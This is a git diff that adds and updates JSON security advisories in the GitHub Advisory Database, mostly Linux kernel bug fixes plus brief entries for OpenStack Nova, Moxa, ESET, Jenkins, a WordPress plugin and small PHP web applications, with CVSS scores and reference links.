b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json new file mode 100644 index 0000000000000..edaeeda4887fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j87r-wgfm-7fjj", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: virtio - Add spinlock protection with virtqueue notification\n\nWhen VM boots with one virtio-crypto PCI device and builtin backend,\nrun openssl benchmark command with multiple processes, such as\n openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32\n\nopenssl processes will hangup and there is error reported like this:\n virtio_crypto virtio0: dataq.0:id 3 is not a head!\n\nIt seems that the data virtqueue need protection when it is handled\nfor virtio done notification. If the spinlock protection is added\nin virtcrypto_done_task(), openssl benchmark with multiple processes\nworks well.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/49c57c6c108931a914ed94e3c0ddb974008260a3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c0a0ded3bb7fd45f720faa48449a930153257d3a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d6f0d586808689963e58fd739bed626ff5013b24" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e69a7b0a71b6561b3b6459f1fded8d589f2e8ac2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json index 8de01d65798ed..99b4c77dd87af 100644 --- a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json +++ b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jggw-c47g-3w3q", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2026-0714" ], "details": "A physical attack vulnerability exists in certain Moxa industrial computers using TPM-backed LUKS full-disk encryption on Moxa Industrial Linux 3, where the discrete TPM is connected to the CPU via an SPI bus. Exploitation requires invasive physical access, including opening the device and attaching external equipment to the SPI bus to capture TPM communications. If successful, the captured data may allow offline decryption of eMMC contents. This attack cannot be performed through brief or opportunistic physical access and requires extended physical access, possession of the device, appropriate equipment, and sufficient time for signal capture and analysis. Remote exploitation is not possible.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json new file mode 100644 index 0000000000000..73ff26837c6b7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jp99-8xc8-367m", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23221" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: fsl-mc: fix use-after-free in driver_override_show()\n\nThe driver_override_show() function reads the driver_override string\nwithout holding the device_lock. However, driver_override_store() uses\ndriver_set_override(), which modifies and frees the string while holding\nthe device_lock.\n\nThis can result in a concurrent use-after-free if the string is freed\nby the store function while being read by the show function.\n\nFix this by holding the device_lock around the read operation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23221" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1d6bd6183e723a7b256ff34bbb5b498b5f4f2ec0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a2ae33e1c6361e960a4d00f7cf75d880b54f9528" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json new file mode 100644 index 0000000000000..029b80444b10b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m34c-wrf8-mw69", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71237" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: Fix potential block overflow that cause system hang\n\nWhen a user executes the FITRIM command, an underflow can occur when\ncalculating nblocks if end_block is too small. Since nblocks is of\ntype sector_t, which is u64, a negative nblocks value will become a\nvery large positive integer. This ultimately leads to the block layer\nfunction __blkdev_issue_discard() taking an excessively long time to\nprocess the bio chain, and the ns_segctor_sem lock remains held for a\nlong period. This prevents other tasks from acquiring the ns_segctor_sem\nlock, resulting in the hang reported by syzbot in [1].\n\nIf the ending block is too small, typically if it is smaller than 4KiB\nrange, depending on the usage of the segment 0, it may be possible to\nattempt a discard request beyond the device size causing the hang.\n\nExiting successfully and assign the discarded size (0 in this case)\nto range->len.\n\nAlthough the start and len values in the user input range are too small,\na conservative strategy is adopted here to safely ignore them, which is\nequivalent to a no-op; it will not perform any trimming and will not\nthrow an error.\n\n[1]\ntask:segctord state:D stack:28968 pid:6093 tgid:6093 ppid:2 task_flags:0x200040 flags:0x00080000\nCall Trace:\n rwbase_write_lock+0x3dd/0x750 kernel/locking/rwbase_rt.c:272\n nilfs_transaction_lock+0x253/0x4c0 fs/nilfs2/segment.c:357\n nilfs_segctor_thread_construct fs/nilfs2/segment.c:2569 [inline]\n nilfs_segctor_thread+0x6ec/0xe00 fs/nilfs2/segment.c:2684\n\n[ryusuke: corrected part of the commit message about the consequences]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71237" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4aa45f841413cca81882602b4042c53502f34cad" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8c5ee234bd54f1447c846101fdaef2cf70c2149" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/df1e20796c9f3d541cca47fb72e4369ea135642d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ea2278657ad0d62596589fbe2caf995e189e65e7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json new file mode 100644 index 0000000000000..f89bc387274d7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4f3-qp2w-gwh6", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-24708" + ], + "details": "An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qemu-img without a format restriction, resulting in an unsafe image resize operation that could destroy data on the host system. Only compute nodes using the Flat image backend (usually configured with use_cow_images=False) are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24708" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/nova/+bug/2137507" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2026/02/17/7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-669" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json new file mode 100644 index 0000000000000..6013449d93966 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4v3-95xp-3j5h", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70147" + ], + "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70147" + }, + { + "type": "WEB", + "url": "https://projectworlds.com/online-time-table-generator-php-mysql" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70147-OTTTG-Info-Disclosure" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json index df6640dd80d20..c454d322223a0 100644 --- a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json +++ b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mc8x-4j6m-qj3r", - "modified": "2026-02-06T15:31:02Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T15:31:02Z", "aliases": [ "CVE-2025-13818" ], "details": "Local privilege escalation vulnerability via insecure temporary batch file execution in ESET Management Agent", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json new file mode 100644 index 0000000000000..ea6059e047666 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx4x-pxgm-r77w", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71231" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode\n\nThe local variable 'i' is initialized with -EINVAL, but the for loop\nimmediately overwrites it and -EINVAL is never returned.\n\nIf no empty compression mode can be found, the function would return the\nout-of-bounds index IAA_COMP_MODES_MAX, which would cause an invalid\narray access in add_iaa_compression_mode().\n\nFix both issues by returning either a valid index or -EINVAL.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71231" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c77b33b58512708bd5603f48465f018c8b748847" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d75207465eed20bc9b0daa4a0927de9568996067" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/de16f5bca05cace238d237791ed1b6e9d22dab60" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json new file mode 100644 index 0000000000000..f43c4e522439a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p525-h9pq-233r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23225" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/mmcid: Don't assume CID is CPU owned on mode switch\n\nShinichiro reported a KASAN UAF, which is actually an out of bounds access\nin the MMCID management code.\n\n CPU0\t\t\t\t\t\tCPU1\n \t\t\t\t\t\tT1 runs in userspace\n T0: fork(T4) -> Switch to per CPU CID mode\n fixup() set MM_CID_TRANSIT on T1/CPU1\n T4 exit()\n T3 exit()\n T2 exit()\n\t\t\t\t\t\tT1 exit() switch to per task mode\n\t\t\t\t\t\t ---> Out of bounds access.\n\nAs T1 has not scheduled after T0 set the TRANSIT bit, it exits with the\nTRANSIT bit set. sched_mm_cid_remove_user() clears the TRANSIT bit in\nthe task and drops the CID, but it does not touch the per CPU storage.\nThat's functionally correct because a CID is only owned by the CPU when\nthe ONCPU bit is set, which is mutually exclusive with the TRANSIT flag.\n\nNow sched_mm_cid_exit() assumes that the CID is CPU owned because the\nprior mode was per CPU. It invokes mm_drop_cid_on_cpu() which clears the\nnot set ONCPU bit and then invokes clear_bit() with an insanely large\nbit number because TRANSIT is set (bit 29).\n\nPrevent that by actually validating that the CID is CPU owned in\nmm_drop_cid_on_cpu().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json new file mode 100644 index 0000000000000..cd62b1ccfc1e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p68h-c56f-p3v6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: split cached_fid bitfields to avoid shared-byte RMW races\n\nis_open, has_lease and on_list are stored in the same bitfield byte in\nstruct cached_fid but are updated in different code paths that may run\nconcurrently. Bitfield assignments generate byte read–modify–write\noperations (e.g. `orb $mask, addr` on x86_64), so updating one flag can\nrestore stale values of the others.\n\nA possible interleaving is:\n CPU1: load old byte (has_lease=1, on_list=1)\n CPU2: clear both flags (store 0)\n CPU1: RMW store (old | IS_OPEN) -> reintroduces cleared bits\n\nTo avoid this class of races, convert these flags to separate bool\nfields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3eaa22d688311c708b73f3c68bc6d0c8e3f0f77a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4386f6af8aaedd0c5ad6f659b40cadcc8f423828" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cfa4c37dcbcfd70866e856200ed8a2894cac578" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json index 347a03450b14b..bc18a59fea38a 100644 --- a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json +++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json @@ -45,7 +45,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json new file mode 100644 index 0000000000000..e88b5b1de3963 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3v9-r7ff-976x", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70149" + ], + "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70149" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70149-Membership-SQLi" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json index 4d5790a195744..b47498da8485d 100644 --- a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json new file mode 100644 index 0000000000000..d0fa6dd3ed933 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w35p-gjc5-2g6r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2230" + ], + "details": "The Booking Calendar plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 10.14.14 via the handle_ajax_save function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, and booking permissions granted by an Administrator, to modify other users' plugin settings, such as booking calendar display options, which can disrupt the booking calendar functionality for the targeted user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2230" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/save-user-meta/save-user-meta.php#L90" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456856" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60f7df44-22f9-4a9e-a20c-4b8628674079?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json new file mode 100644 index 0000000000000..940a4d6d2b01d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w94g-pmcx-r454", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/653f8b6a091538b084715f259900f62c2ec1c6cf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71dee092903adb496fe1f357b267d94087b679e0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7d31dde1bd8678115329e46dc8d7afb63c176b74" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json index 1ca49c2294cfa..a7b941c542df3 100644 --- a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wfhp-qgm8-5p5c", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27100" ], "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index a0236b79690b7..34a5ea5e82e9e 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-287" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json index ceb4a2d258e16..4c28aa477e6c3 100644 --- 